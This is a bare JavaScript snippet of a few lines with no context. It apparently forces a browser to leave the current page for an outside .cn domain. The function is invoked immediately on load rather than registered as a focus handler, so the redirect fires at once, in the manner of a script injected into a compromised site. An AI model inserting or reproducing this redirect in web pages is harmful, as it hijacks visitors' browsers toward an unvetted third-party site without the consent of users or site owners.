function f(){
document.location.href='http://extratube.cn';
}
window.onFocus = f()
